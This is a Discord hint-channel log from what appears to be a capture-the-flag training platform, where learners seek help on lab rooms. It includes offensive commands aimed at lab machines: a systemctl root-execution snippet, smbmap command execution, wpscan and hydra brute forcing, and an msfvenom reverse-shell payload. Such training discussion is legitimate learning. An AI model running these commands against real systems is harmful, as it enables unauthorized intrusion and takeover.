#room-hints

You can always go back

dude the skynet box makes want to go watch T2 lol

CC: Pen Testing smbmap ipconfig = smbmap -u'admin' -p'password' -h 10.10.10.10 -x 'ipconfig' please help

I don’t see a question

task 20 in last

The priv esc for skynet is crazy..thankfully for google or else I would never have figured that out... on to the next!

Hi All, just need some pointers. I'm bogged down in the Cross-Site Scripting Room. Task 4 #1. Craft a reflected XSS payload that will cause a popup saying "Hello". I've tried the script alert statement but I'm told to think again. Please help?

CC: Pen Testing smbmap ipconfig = smbmap -u'admin' -p'password' -h 10.10.10.10 -x 'ipconfig' please help
@iron swan space, quotes, go figure

How good is waiting for hydra to crack things.

For THM rooms, you should not be wating for too long. ~15minutes is enough I guess

well, i've been waiting way too long

even just went and had a shower

still not done.

Hi
Is anybody able to help with a problem I'm having executing the PowerUp script for the Steel Mountain room please?
I can upload the script and start powershell, but when I try and execute the script nothing happens
I can't figure out what I'm doing wrong at all, any hints would be much appreciated
I start off with the "PS >" prompt
but when I try "PS >. .\PowerUp.ps1" the I move to a new line without the "PS >" prompt
Really not sure what I'm doing wrong here
Seem to have killed the conversation in here too
just like my PS session

Hi
Is anybody able to help with a problem I'm having executing the PowerUp script for the Steel Mountain room please?
I can upload the script and start powershell, but when I try and execute the script nothing happens
I can't figure out what I'm doing wrong at all, any hints would be much appreciated
I start off with the "PS >" prompt
but when I try "PS >. .\PowerUp.ps1" the I move to a new line without the "PS >" prompt
Really not sure what I'm doing wrong here
Seem to have killed the conversation in here too
just like my PS session
@keen flume im not sure but maybe powershell is restricted to run some files

It’s sometimes difficult to upgrade to powershell on boxes

Try running it without droppin into a powershell shell

hi..
i try to make challenge learn linux and on task 18, i don`t understand what he want in the second "
What is the value of the home environment variable"

what i need to do?

Get the value of the home environment variable

Make sure you've swapped users like you're meant to

Make sure you've swapped users like you're meant to
@stuck fractal what is mean? switch to user?

You have the password for shiba2 by now, correct?

You have the password for shiba2 by now, correct?
@stuck fractal aehh no..becuse i`m return to this challenge after 2 weeks or more

then switch to shiba2?

You're meant to, by this task. At least I'm fairly sure.

are you remember what is the password to shiba2?

I'm not going to tell you it.

If you've completed the task, you entered it into an answer box on TryHackMe

Look back at the section for the first binary

yeah yeah i looking back

then now i need to do echo $home and find the answer?

or to look inside in some folder?

a little bit of help with the file upload room?

i figure the task

room name Upload Vulnerabilities

im at the last task

hey, need help for Vulnersity : https://tryhackme.com/room/vulnversity, idk if i need to put this || TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "id > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
./systemctl link $TF
./systemctl enable --now $TF || in a text file or if i can put in in the shell

which task is this

for vulniversity

oh ye sry, task 5 #2

I need help in SESH Birthday CTF I stuck at killswitch flag can't understand how to get flag

I also know i need to modify the command

you dont have to put it in a script

just copy and paste everything into the shell

ok, but i have another problem, i just don't really know what the command is doing

|| i know i can execute a command with the root permissions but idk where i need to put the /root/root.txt in the command ||

have you gotten the contents of the /root/root.txt already?

no

if you have root permissions you can run cat /root/root.txt to get the contents

the content is the flag you are looking foor

i don't have it, i need to get root with || systemctl exploit and read the root.txt flag||

yup

and you just typed out the whole exploit previously in your first question

once you copy and paste the few lines you can run whoami

you should be root

ye, but someone told me i need to change something in the command

why dont you try it out first

without changing anything

pretty sure i did not change anything when i tried that exploit

it just give me that

try running whoami

i'm still || www-data ||

Those last two lines are wrong

Anyone know what this might mean?

I think its port knocking, but I don't know what to do after..

https://tryhackme.com/room/theblobblog
Enumeration
{REDACTED}

Can you wait 1 more day till we ask for hints on the room please?

I’ll release writeups tomorrow then you can ask away

Sorry! Though it was a 10 day waiting period

In the meantime you can DM for hints if you want

The room was released on Wednesday (I know a bit confusing cuz the created date is wrong rn)

hi all I'm stuck at "windows forensics" point #11 .....someone could give me a hint? thanks

hm someone a hint for golden eye task 2 #3 ? it feels like not hte obvious answer, no clue what i am messing up. i even connected to the service and got all the data from it

Hey in the blog log room I decoded both the msg tried bruteforcing SSH looked for more open ports still couldn't find something am I missing something?

@eternal brook Can you please wait one more day, as the creator stated above? It's a brand new room

https://tryhackme.com/room/theblobblog

Yep.

oh alright

i saw the date 38 days old

it showed 38 days at bottom...

yeah that is confusing, i think when kiba was listed as new on dashboard, it also showed a higher number, now it shows 8 days or so

It's being fixed soon

Normally rooms have that date reset on release

can i pm you? @oblique cliff

Yes but I’m going to doggo park so won’t answer for a bit

guys in the linux challenge room, i somehow managed to download flag32.mp3 but i can't listen to it

what do i do?

Copy it onto a machine where you can listen to it?

like my own machine?

That works

how can i do that can you teach me

Copying files from place to place is fairly fundamental

I'm certain you can find out how with some research

okay thanks :)

Guys any help with TheBlobBlog ?
Kinda stuck

Still a new box, give it another day please?

Not even hints ? I hit a dead end.

puttygen newkey -O private-sshcom -o newkey.puttygen-sshcom

what does*** private-sshcom*** mean here ?

not even hints for 1 more day plz 🙂

@shut pollen you can PM for hints if you want

Thanks Buddy

Can anyone give me a hint on Tartarus? ||I found the user list and password list in the hidden directory, but I was unable to use hydra to log into ssh or ftp with them so now I'm not sure what to try||

login hydra for ssh mmmm

@valid elbow have you “gobustered” hard enough?

i went to the end of the kali medium size list, I guess I can always gobust some more. Theres someting on port 80 im missing then?

You won’t find it in a wordlist

I don’t know how much of a hint you want but you may need to pay really close attention

Because you’ve definitely missed something.

Does anyone have the flag for the new OWASP Juice Shop task 7.2? I've gotten the XSS to work a dozen different ways but the flag wont pop.

I am at OWASP Top 10 Task 21 #2 and I get the XSS to say hello but it apperars to be wrong for the answer

What payload are you using?

I got it.. I used " instead of '' or whatever char it was I copied the example and tried to use an edited version

👍

Room Name: Easy Peasy
Rooted the machine but couldnt find flag3, any ideas?

It should be on the web page just keep looking

i lookedup in writeups but they also didnt mention anything about flag3

nvm

got it

it was infront of my eyes this whole time

On first page you open 😄

and as per the question, it doesn't need to be cracked, its just written there, i think its for confusing peeps,
nah i had to go to other port

I forgot there is another port 😄

Help with BlobBlog yet ?

Wait one more day.

Why is this taking ~13 hours

my only thought is because it's being run on a vm, but even then..

It took me less than 5 mins it shouldn't take that long

See, that's what I mean. I dunno why it's taking forever.

What wordlist did you use?

fsocity

It could be because you put elliot with a capital

Try a lowercase on the e

|| wpscan --url http://robot/wp-login -U elliot -P mrrobot/fsocity.dic -t 150 || That's the command I'm using now.

We'll see.

I'm gonna assume it's gonna be something to do with the fact I'm using a vm tho

how many cores are you using and how many memory are you using

memory is 4GB, core is set to 4.

okay

which is literally half of my actual machine.

good

I'm almost tempted to bump it up to 6 cores, and 6GB of RAM tbh.

because my windows is used for discord, and occasionally youtube when I'm waiting for things to happen

okay good luck

Should I enable AMD-V and/or PAE/NX?

no idea

i'm just gonna play around and see.

@dusk imp which room is it?

mrrobot

I'm doing what Esqy suggested and using the browser based attack machine to see if it's just my vm being silly

@dusk imp it’s almost certainly because you left duplicates in the dictionary

Oh.

Thank you blob.

You’re welcome

I’m a blob

|| I don't know if I should have favourites, but you are one of my favourites. ||

Hahaha.

My radiance just increased

I didn't want to upset the others. 😛

||we don’t worry about the others 😘||

Hahahaha.

@oblique cliff It was absolutely the dups.

how didn't I notice the dups previously though, silly me

😄

Neither did I when I did the room 🤷🏿‍♂️

Not silly

how in the world did you do the room with a duplicated dic?

I didn’t I saw it was gonna take 13 hours was like there’s no way that’s right and peeked at a walkthrough haha

Ahh I see.

yeah, from 858,000 to 11451..

Yep, that scan you showed would’ve been halfway done already haha

it just finished.

It worked I hope?

Negative @oblique cliff

Show syntax 🤔

guys in advent of cyber DAY 11

i found mysql password

it says i access denied

Is it for root?

yes

As a spoiler what do you think tha password should be

||securepassword123||

Huh that should work

Uhhh reboot the box?

I haven’t done that room so I’m not really sure unfortunately

ok i will reboot the box

thats weird i still can't login xD

I don’t know 😦

Uh

@trim haven

Have you done advent if cyber

It's not the root password

@foggy blaze

It's not the root password
@crystal glade anyways thanks i fixed it

👍

Hi. 🙂

Jack – root: I’ve found a family of writable files that match the hint.

My initial thought was looking for SUIDs or cronjobs to that involve p——n. Crontab seems “empty” and suid3num tagged all the SUIDs as common.

Tried pgrep to see if there are other services that may call p——n but am not sure what to look for.

Blog posts discuss finding writable files but assume SUID or timers for execution.

Try again? Try differently? Try smarter? 🙂

Haven't done that room so this may not be relevant but something I always look out for are import statements and the locations (and order) in which the interpreter searches for the modules

Haven't done that room so this may not be relevant but something I always look out for are import statements and the locations (and order) in which the interpreter searches for the modules
@edgy aurora

Do you know any ways of listing root-jobs that utilize p——-n? I’ve found scripts owned by root and have plenty of ways to tamper with the modules. Just not finding a timed binary or script that will ultimately call a module.

Hello, I need a hint in the c4ptur3-th3-fl4g room. task 2 question 1. I don't know how to get message from the audio wav file. I have opened it in audacity but don't know what to do with it. Also there are not writeups talking about it.

linpeas would probably find anything relevant if you haven't already ran it @narrow wren

@terse kiln you're probably looking at the waveform by default in Audacity, try to find a spectrogram view in the program and see what it looks like

Learning Linux #43 - The True Ending. I am at the very last part and have found the correct user to open the secret file. But I do not know the password. We were given all the other user's password in the tutorial, but not the one I need. Is there something simple I am missing here?

Learning Linux #43 - The True Ending. I am at the very last part and have found the correct user to open the secret file. But I do not know the password. We were given all the other user's password in the tutorial, but not the one I need. Is there something simple I am missing here?
@spiral yew

“Everything you need is on this page.” 🙂 Was there something there you may have overlooked the last time?

I just found it. It was not on that page, lol.

I just found it. It was not on that page, lol.
@spiral yew Congrats. 🙂 I remember finding the clue on the page, but you had to blink twice and re-read everything.

On the actual tutorial page the password is in there?

Or the method of getting it

There is something there that points you toward how to find it. 🙂 Flew right over my head while I was doing the tasks.

It’s a thing some box-devs do to test your attention to detail. I did another box where a password was written inside a paragraph on the first page you see, and I totally missed it.

@narrow wren pspy can catch cron jobs

@narrow wren pspy can catch cron jobs
@stuck fractal Thanks, will check it out.

Assuming you've checked the global crontab, right?

Yup

For the life of me, I can't seem to see what the correct error is for the burpsuite room

Any help getting to the right direction will be very much appreciated

Any help getting to the right direction will be very much appreciated
@bleak arrow where is the closing curly brace

in ur request

Also missing a comma separating the fields?

in ur request
@dense violet
I didn't think before deleting all that.. Guess I just need to start it over

@dense violet
I didn't think before deleting all that.. Guess I just need to start it over
@bleak arrow nah just put the ',' and the '}'

{ "email" :"'", "password":"'"}

{ "email" :"'", "password":"'"}
@dense violet

Thanks

@narrow wren pspy can catch cron jobs
@stuck fractal Rooted. Thanks for the hint. 🙂 Pspy is awesome.

Sweet, glad it helped

yare yare desu

that splunk room is really tough lol

anybody working on "jacob the boss" root part ?

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

anybody working on "jacob the boss" root part ?
@obsidian fog as that's a very new room, please wait a couple days before asking for help or hints

NP, thank!

Burp suite task 13 hint please. Anyone? 🙏

Which question?

Both can be solved by reading the report

No shortcuts there, you have to actually read it

Both questions tbh lulzz

By reading? Oops then let me read again

Ah thanks so much 🙏 I’m finally Burped 🥳🥳🥳

Anyone available that can help with the new Juice Shop?

Jacob the boss... got the user flag, but this priv esc is driving me a little up the wall. I feel like I've tried to do it the right way, but messed up something small.

Not asking for hints, just stating it's a good box lol

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

There's #522158404614225920 for that

hints on root for jacob the boss

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.
Hey, as that's a brand new room please wait a couple days before asking for help or hints @nocturne relic

k

Room CC:Pen_Testting > Task 4 > Gobuster

When I tried to man gobuster

I get nothing > just saying that no manual entry for gobuster

How to solve this?

lol so I'm working through the Linux Challenges room.
I've run into the ultimate in vague instructions.
"Find the difference between two script files to find flag..."
obvs the diff command, but which two script files...? or am I missing something?

I'm missing something. nvm.

How to solve this?
Nevermind solved it

What show does Jim reference in his review?

in OWASP Juice Shop

Have you looked at Jim's reviews?

Hello everyone, I just i need help. How can i fix this ? im at PS EMPIRE room but i cant run the empire --- FIXED 😄

Nevermind guys I fixed it myself 😄

Hello guys, can someone give me a hint about privilege escalation in this new box called Jacob the boss?

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

is hint available now for the blob blog room??

Yep!

Where are ya stuck?

am still stuck with www-data

have been enumerating am getting nothing

You didn’t find any weird or out of place files durin your enumeration

blogFeedback

Ghidra it is 🙂

kkk thanks for the hint

👍

let’s try to stick with 2 or 4 ‘k’s next time 😱

kkk noted

trying to crack a hash with hashcat, can i get a hand

any hint for Theseus foothold.

pretty sure @limber bane said no hints will be given for that box

pretty sure @limber bane said no hints will be given for that box
@oblique cliff on my ... ever ?

thought, its been a while to resease box so its ok to ask now.

gotta wait for him, cuz im not sure...

suit-y boy, whats the dealio?

I need some help in the privilege escalation part of the room "Retro", I am currently user "nt authority /iusr".

I've tried the following:

• OS Version exploits
• Searching for weird services/scheduled tasks/software, the only one mildly suspicious being google chrome, but I couldn't do anything like finding password stores as my current user does not give access to the other users.
• Check the powershell history
• Check for unattended files
• Check for weird files/passwords stored in files...
• Check unquoted service paths
• Check for stored credentials with cmdkey /list
• Check for AlwaysInstallElevated privilege
• Check passwords in registry
• Check for the web server logs (no access)
• Check local services not exposed to the "world", only found smb without any shares, mysql, and some other service I can't identify. (can't reverse tunnel it as I don't have the current user password).
• Found the SeImpersonatePrivilege enabled but unsucessfully exploit it.
• Check for weird permissions on folders & files.

Im kinda running out of ideias, my best lead is the SeImpersonatePrivilege, the weird local service on port 5985 and Google Chrome. Which I couldn't sucessfully exploit any of those.

Yo, no hints for theseus my dudes

There will also be no walkthroughs accepted

@white salmon check the pin in #room-help it shows what you shouldve found in the browser history

so in advent of cyber room task 22 day 17(hydra-ha-ha-haa) i tried bruteforce by hydra with rockyou wordlist..but still not able to get inside..as per the hint password would be from first 30 words in the list even tried manual bruteforcing but i am not able to go through please check it ones

any help for upgrading the initial shell in jacktheboss? tried a bunch but no luck

As that's still a new room, please don't ask for help or hints just yet @nocturne vault

gotcha

@stuck fractal please help me

Sorry, I don't help people when they beg like that. We're all volunteers. I help people at my own pace.

sorry for my mistake ,i would be more careful next time @stuck fractal

you don’t need to ping him he is always watching 😄

@white salmon check the pin in #room-help it shows what you shouldve found in the browser history
@oblique cliff couldn't find the pin you mean, but im giving up and checking the write-ups im too dumb for this room

💀

Did you go to #room-help

Or are you still looking in this chat

https://discordapp.com/channels/521382216299839518/522158539129618453/744162487103914015 @white salmon

its the same CVE

sorry, i forgot to mention that, my bad

No you did Blob

hummmmm thanks I'll check it out but im not on task 3 stuck

where are you stuck?

the privesc i thought?

privilege escalation from the initial shell

uh how did you get a shell?

didnt you ||just RDP in||?

reverse shell***

xd

Bob

what the heck am i thinking of

Literally told you what you need for priv esc

Im kinda confused

what the heck am i thinking of

I am Blob

What task are you on

ok I'll check it out xD

not Bob

What task are you on
@trim haven

@white salmon

oh thought you were asking jabba

the user.txt task 2

room Retro

I am Jabba :3

XD

im definetly brain dead

Which question sorry?

its not a question

I am user nt authority /iusr, the user I suppose is wade

I don't have access to the wade user

Wait what room are you on

retro

OHHHH

And you are NT authority

"nt authority /iusr" yes

the user running the wordpress web server

Oh okay I see

@oblique cliff have you done retro

yes

what is issue

Help pls I haven’t

ok allex

lets start from the beginning

how is your day going?

kinda ok not that good

frustating

💀

haha ok, how did you get an initial shell on the system?

logged in with the wordpress user wade, edited the 404.php

with a php windows reverse shell

ok thats actually kinda hilarious cuz thats completely unintended

not to worry you can still do the box

How about ||reusing those creds||?

@stuck fractal

he can still do the box like he is now

@oblique cliff

let us continue down this path

hummmmmmmmmmmmmm

he can still do the box like he is now
@oblique cliff yes but ezpz

james stop, its just as ezpz this way

been enumerating it for quite some time

allex, enumerate the OS version a bit more

you missed something

windows server 2016 standard 10.0.14393 n/a build 14393

did you run anything like windows exploit suggester, sherlock,etc

I had to do manual enumeration cause the machine was constantly breaking

with powerup and winpeas

did you do windows exploit suggester

winpeas and power up dont show kernel exploits i dont think

i dont know whats that

which is what youre going to want

Ill check it out

https://github.com/AonCyberLabs/Windows-Exploit-Suggester

it suggests kernel exploits

on windows machines

hence the name

thanks a lot I think I can do something now, I tried searching for the version exploit but didnt find anything,

kek

🙂

Guys need help Linux challenge flag15 any clues ? or hint except for *release

That's a valid file glob

i found 2 look a like flag hash in 4.4.0-75 and 72 but it was not the flag lol

Look up shell globbing

Ok thanks ill research about that 😄

Using nmap - what is the fastest way to scan for open TCP ports 1 - 65535? I only want what ports are opened, no details on the services, OS, or anything. I tried doing a syn scan -sS T4 but it takes forever.
(Maascan is quick but I noticed it misses ports sometimes)

rustscan

https://github.com/RustScan/RustScan

65k ports in 39 seconds, it scans the ports then pipes it to nmap and uses the flags for service detection etc.

For reference https://raw.githubusercontent.com/RustScan/RustScan/master/pictures/with_rustscan.gif

Thanks, looks interesting. Was hoping I could use nmap though

This does use nmap

It checks which ports are open then uses nmap -A -p [Ports]

(I think it stopped using -A?)

If you want to use nmap and only nmap I'd suggest you doing nmap -T4 <IP> then whatever you get do nmap -A -p<listports>

(I think it stopped using -A?)
Not sure but it will still cover the required things so 🤷‍♂️

If you want to use nmap and only nmap I'd suggest you doing nmap -T4 <IP> then whatever you get do nmap -A -p<listports>
@trim haven But this is basically what rustscan does, just slower.

Ok great! thank you!

doing CC pentesting, on the first part where you have to get user/root on the box, found the open ports, scanned port 80 with gobuster didn't find a foothold even though there's supposed to be a file with creds on it

Scan with extensions, try different wordlists, try recursive if you find dirs

found ||/secret/|| directory but using curl/burp suite there's nothing there, in the walk-through there's supposed to be ||creds|| I have also tried terminating and starting a new VM

So, you found a dir. Why not use gobuster on that dir to see if you can find anything in there? Curl just acts like a browser, not much point here

I did, found nothing

ok NVM

found it

In task 10 of the burpsuite room I should look for a response which issues a cookie but I can’t find it. I have done the room like 5 times over now but stuck. Can someone give a hint?

@white salmon Make sure you're looking at responses

And you want a Set-Cookie header

@stuck fractal thanks!!! I feel so stupid now but finally progress

The analyse can be a bit buggy btw, but that's a burp thing

Hey I was trying to complete the CC: Pen Teating room by paradox

In the 4th task (web enumeration using gobuster)

Should i be using common.txt?

You can use any list found in the directory busting directory default on kali and it should do the trick

Taking too long 😪

Found it

🥳

Can someone point me in the right direction for the privilege escalation in jacobtheboss?
I haven't found anything out of the ordinary yet, ||dirtycow seems patched|| and I didn't notice anything special in linpeas' output.
I'm currently cracking away at jacobs password hash from the cms to see if I can use that somehow.

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

New room wait a bit for hints please

Huh, go figure, didn't notice that. How long is a box considered new?

Until the room decided explicitly says or a few days like 3/4 days

The # days old in the room is wrong rn

Will be fixed

It was released like 2 days ago iirc

Jk released yesterday

can anybody give me a gentel nudge with CC: Ghidra room im stuck on the very last question. I don't understand what they are asking for.

If you show the question I can

I don’t remember it

[Task 6] Final Exam

You should now be able to competently analyze a binary. Now is the chance to show your skills with this crackme! The final exam is the binary called final_exam.
#1

What outputs the good job message?

the decompiler shows printf outputs the good job!!! message but thats not the correct answer

They’re asking for what input into the binary will cause the binary to display that message

do i need to somehow extract "the binary called final_exam." from the downloaded a.out file to find the correct answer?

No you run the binary with the proper input and it’ll print out that line

That make sense?

It’s basically just asking what’s the password

Hey, I'm on the Intro to x86-64 room and I've been banging my head for about 3h on the crackme2 [task 7]. I found that the crackme2 executable read the content of ||/home/tryhackme/install-files/secret.txt||, but the content of it (||"vs3curepwd"||) is not the answer. I know I am missing something so could you give me a hint please? @me if you reply to this message

Hey, Im doing CC: Pen Testing to refresh and im on this question.
What is the name of the hidden file with the extension xxa

I have tried using the common.txt wordlist and haven't come up with anything

Make sure you're looking on /

thats probably what it is, I was running in the hidden directory

thanks

@long oak depends how big of a hint:

small-ish: ||put breakpoints everywhere and see what the binary is doing to your input||
big: ||take the hint given in the room literally||

Greetings! I need a nudge on the box 'Relevant' .. I found some loot but when I try to authenticate with what I found it gets me nowhere.. if you want to give me a nudge or small clue DM me please

I see a write up but don't want to go through it yet

We can chat here.

my last guess was to use wireshark for maybe a clue on the wire

Keep in mind that I built the challenge to force you to know when to quit and try another approach.

ok ill keep thinking

So having found what you have, and seeing as you continue to get nowhere with it ||as intended||, make sure to go back to your scan and check those results.

If you did a basic scan, consider a full port scan.

nmap -p- 10.10.166.31 T4 -Pn
nmap -A -T4 -p 80,135,139,3389,49663,49666,49668 10.10.166.31 -Pn

Those are the scans I ran

That's all you need. 🙂

ok ill read back over my results

Enumerate everything, not just what appears to be obvious.

If you need any more help please feel free to ask. I'll be around for a bit longer tonight.

ok cool

So when trying to use rockyou.txt with john i get a bunch of warnings and the password doesn't actually crack. https://puu.sh/GqlY9/c5777da4f5.png

it does crack if you give it time

https://puu.sh/GqlYC/871195977d.png

But you're not specifying the wordlist correctly

If you identify the hash and declare it with the --format flag, it will probably be faster as well.

--wordlist= or -w=. No spaces allowed.

Ah, that fixed it

Is it safe to assume anything -x will be safe to use with =?

It's specifically john being fussy

Most programs don't use that

evening everyone, any hints on a wordlist to use for the brute force wps attack? Trying to run rockyou against 3 users is taking forever...

evening everyone, any hints on a wordlist to use for the brute force wps attack? Trying to run rockyou against 3 users is taking forever...
@silent trellis Room, task, question?

sorry my bad... this is for the Jack room

If that's taking ages, why not try a shorter wordlist first?

@stuck fractal started trying to run the xato ones as well, but up to the 10k list already and not having luck.

Fasttrack is nice and short

thank you I'll give that one a shot

ummm

ghost ping?

I noticed relevant sometimes closes its ports on me after a while.

Maybe thats from me scanning against it too much?

You may be knocking a service down if you are trying to scan it too quickly.

ok

one thing i noticed is that I can make a connection to the httpapi port 49663 using ftp, netcat, etc.. but doesn't do much

What else have you tried with that port?

tried to hit it via web browser

Have you checked for subdirectories?

yeah..

Did you find anything?

oh wait,

i have to specify that port in the gobuster scan

yep

Make sure you're using a robust enough wordlist too.

interesting.. ok.. yeah that makes sense.

thanks i will roll with this and see how far i can get!

An IIS webserver can have multiple sites as long as they are listening on different ports, therefore directories may exist behind each port. Gotta remember that for next time

🙂

My brain didn't click that once I tried to hit it via web browser on 49663 and saw the default IIS lol

I just stopped

Fowsniff CTF - has anybody used the python3 reverse shell into ||cube.sh||?

is this allowed to ask hint about room ||Jacob The Boos|| ?

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

stuck on last question for basic pentesting, any hints?

Have you checked the Hint?

found /usr/bin/vim.basic had root perms so just gave jan root and cat pass.bak

This is the last question

Correct?

Room CC: Pen Testing

Room CC: Pen Testing

LHOST is wrong.

You put both the LHOST and the RHOST as the same value/

Yes

So I shouldn't set the lost?

Lhost*

Have you done the metasploit room?

No...

Maybe try doing that so you can understand how to use metasploit :)

Fair point

Thanks

@dire zinc Have you found any suspicious files?

i got it using vim.basic

Okie dokie

Hey guys im struggling with the owasp top 10 room, day 8, the rce remote execution, I have altered the encloded payload in the cookie, refreshed but Netcat isnt capturing anything, tried a few times

@sullen seal I just did that one yesterday and it worked fine by following the hints/walkthrough. Did you make sure you followed closely, like only copying the base64 between the ' ' from the python output? I'm guessing it's something small like that

Otherwise I'm not sure, sorry

Thanks tat was my thought but I have been through it a few times following closely, I`m not using Kali for my linux machine so maybe there are differences there

@patent token should one of these two lists do the trick for the http directory brute force?
directory-list-2.3-medium.txt
directory-list-2.3-big.txt

any hint for PE at jacob the boss?

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

Sounds good

i have tried everything man i know the rules

if you know the rules why are you asking?

its not a matter of being stuck its a matter of respecting the room creator

Jo2020, 2.3-medium is good

Initial foothold of Theseus ?

The initial Cypher ?

Suitguy has asked that no hints are given at any time for Theseus

Any hints on Year of the Rabbit room? I'm getting rick rolled. 🥺

lol

burp suite @wintry yarrow

@white salmon

ty

how in the world do I get LinEnum to allow me to easily read through it without cutting off half the console

more doesn't work. 😦

Pipe into a file, up your terminal scrollback, more or less should work

well dur, pipe >_>

Thanks James.

burp suite
Alright, let me take a look thanks.

Hey guys. I'm trying to bruteforce an internal service on Internal, but it's taking a long time. Is the password in rockyou.txt?

any hints for the alice in wonderland teaParty file ?

When viewing search results, it's often useful to rename fields using user-provided tables of values. What command do we include within a search to do this?

I have an idea what it is but it won't accept it...

any hints for the alice in wonderland teaParty file ?
@hollow fox do you still need a hint

Is it just me or the flag in owasp juice shop is not working lol

Probably just you

Well a notification You successfully solved a challenge popped out and i just copied the flag and its says its incorrect

Here is a picture

it's you

don't need the error handeling flag

so its not a real flag?

it is a real flag but not the flag you need

I get the same error in the last week

I just reboot the room and it works

Ok thanks 😄 love u guys

was like u searching for an other flag for 2hours lol

lol i just figured i needed to put ' or 1=1-- not choosing one lol

i thought I needed to choose only 1 haha xD

mr robot ctf

stuck finding flag 2

what have you tried?

gobuster on dirs and found few containing some sentences but thats bout it

have you found a login page?

found wp login and /admin which just keeps reloading the screen

in robots.txt you have a dict file, and you have a wp-login page

but no user?

i'm not sure, but i think wordpress says when your user isn't valid

so i think you can try to use wpscan or hydra to brute force users

so brute force users and dic attack password

Brute force user first

Hi, i've been stuck with flag 16 from Linux challenges for quite some time. This flag is in a mounted file and i guess that I have to unmount it (once I find it) to get the flag. I used ||findmnt and mount commands|| to look for it but still nothing. What am I missing?

you need to search your mnt folder

hi

hi

i am suck with this step

my rev.aspx shell can't work in box

its connected

yh

i can't execute any cmd

Hi guys i am in OWASP room i am stuck in task number 7

Which subject

i can't execute any cmd
@quartz ruin type whoami

what was your msfvenom payload

msfvenom -p windows/x64/shell/reverse_tcp LHOST=10.14.1.44 LPORT=1337 -f aspx -o rev.aspx

@white salmon My /mnt has nothing in it. Isn't this the foulder?

there are several places that mounts go

@quartz ruin pretty sure staged payloads have to be caught with a metasploit multi/handler. Either do that, or use an unstaged payload

ok @oblique cliff i will try with multihandler

thanks

not strength

xD

@trim haven yes pls

I was in school until now

@quartz ruin you didnt set the correct payload

it need to match your msfvenom payload

here

look at your payload in metasploit and your payload from msfvenom

i am so tired

my man youre still trying to catch a staged payload with netcat

just generate an unstaged payload

windows/shell_reverse_tcp

also take a break and sleep

everyone needs sleep

even Blobs

Need hints on Year of the Rabbit room. ||So, far tried directory busting, anonymous ftp, analysed with Burp and found out about listening to the video and then in video it says I'm in wrong place.||

navigate around and intercept every request with burp

particularly when they try to rick roll you

||This is happening whether you like it or not... The hint is in the video. If you're stuck here then you're just going to have to bite the bullet!<br>Make sure your audio is turned up!||

Got this thing.

the other time they rick roll you lol

How many times they gonna rick roll me lol?

i think just 2 🤔

||One in assets and one in style sheet?||

theres somewhere where ||they redirect you to youtube to rickroll||

did you hit that yet

Yup. ||On style sheet theres a hidden path.||

@trim haven yes pls
@hollow fox have you tried checking the code for the executable?

perfection

open burp and then visit that link

Let me check.

No

Check away

can you find it on the machine ?

||This is happening whether you like it or not... The hint is in the video. If you're stuck here then you're just going to have to bite the bullet!<br>Make sure your audio is turned up!||
Same I got this and they are saying to disable js.

Oh, is that a hint?

Still couldn't find anything. Can I get another hint?

yes, but you dont need to do that

||look at the requests that you intercept when you click the link||

@sweet storm huh?

Oops, got it.

Thanks Blob.

can you find it on the machine ?
@hollow fox I mean if you’re able to run the file, are you able to download it?

||Now, I'm seeing a hot babe. :)||

lemme think

||Now, I'm seeing a hot babe. :)||
@wintry yarrow 😍

thats what i like to hear

bc its in a user directory i do not know the pw for

only were able to execute it through priv esc

If you can’t run it, get to the point where you can run it

I can

but I do not know how to scp it

bc for scp u need the user's pw

@oblique cliff I'm stuck on flag 16 from linux challenges and can't find a suspicious mount file. Can you give me a hint?

media

mounts can be in /mnt /media or /dev (i think)

bc for scp u need the user's pw
@hollow fox scp is not the only way for file transfer

